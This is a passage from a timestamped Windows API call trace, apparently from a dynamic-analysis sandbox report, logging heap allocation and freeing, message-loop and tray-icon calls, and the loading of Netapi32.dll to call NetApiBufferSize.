[0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889598 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889580 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895b0 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895f8 | out: hHeap=0x770000) returned 1 [0028.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895e0 | out: hHeap=0x770000) returned 1 [0028.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0028.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0028.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0028.891] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 1 [0028.891] TranslateMessage (lpMsg=0x6aeb24) returned 0 [0028.891] DispatchMessageW (lpMsg=0x6aeb24) returned 0x0 [0028.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b7f30 [0028.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0028.891] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae1c0) returned 1 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b7f30 | out: hHeap=0x770000) returned 1 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0028.892] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0028.892] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0028.892] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b7f30 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b7f30 | out: hHeap=0x770000) returned 1 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0028.892] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895e0 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895e0 | out: hHeap=0x770000) returned 1 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af388 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af388 | out: hHeap=0x770000) returned 1 [0028.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0028.892] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12d8 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895e0 [0028.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895f8 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895b0 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af388 [0028.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895b0 | out: hHeap=0x770000) returned 1 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895b0 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0028.893] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0028.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0028.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1350 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889580 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af418 [0028.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af418 | out: hHeap=0x770000) returned 1 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889598 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af418 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889568 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0028.893] PeekMessageW (in: lpMsg=0x6ae4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4d4) returned 0 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13a0 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889520 [0028.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af428 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889460 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0028.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889460 | out: hHeap=0x770000) returned 1 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889460 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0028.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889448 [0028.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891a8 [0028.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0028.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889718 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889748 [0028.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889760 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af448 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889640 [0028.895] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0028.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0028.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af488 | out: hHeap=0x770000) returned 1 [0028.896] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x742b0000 [0028.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899e8 [0028.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0028.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0028.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae948 [0028.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x7ae948, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferSize", lpUsedDefaultChar=0x0) returned 17 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899e8 | out: hHeap=0x770000) returned 1 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1418 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0028.904] GetProcAddress (hModule=0x742b0000, lpProcName="NetApiBufferSize") returned 0x74303789 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1418 | out: hHeap=0x770000) returned 1 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af488 | out: hHeap=0x770000) returned 1 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1418 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af488 | out: hHeap=0x770000) returned 1 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1418 | out: hHeap=0x770000) returned 1 [0028.904] NetApiBufferSize (in: Buffer=0x7ac2f0, ByteCount=0x6ade70 | out: ByteCount=0x6ade70) returned 0x0 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7f30 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a00 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a18 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a30 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a48 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a48 | out: hHeap=0x770000) returned 1 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af488 | out: hHeap=0x770000) returned 1 [0028.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a30 | out: hHeap=0x770000) returned 1 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a30 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a48 [0028.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0028.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0028.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0028.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af488 | out: hHeap=0x770000) returned 1 [0028.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a48 | out: hHeap=0x770000) returned 1 [0028.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a48 [0028.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0028.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0028.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0028.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0028.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af488 | out: hHeap=0x770000) returned 1 [0028.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0028.905] FreeLibrary (hLibModule=0x742b0000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889640 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889460 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889448 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891a8 | out: hHeap=0x770000) returned 1 [0028.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889718 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889748 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889760 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0028.908] PeekMessageW (in: lpMsg=0x6ae4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4d4) returned 0 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af448 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0028.908] PeekMessageW (in: lpMsg=0x6ae4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4d4) returned 0 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0028.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889568 | out: hHeap=0x770000) returned 1 [0028.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af418 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a18 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a30 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a48 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a00 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b7f30 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889520 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13a0 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889598 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889580 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1350 | out: hHeap=0x770000) returned 1 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889580 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889598 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af428 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1350 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889598 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889580 | out: hHeap=0x770000) returned 1 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889580 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889580 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 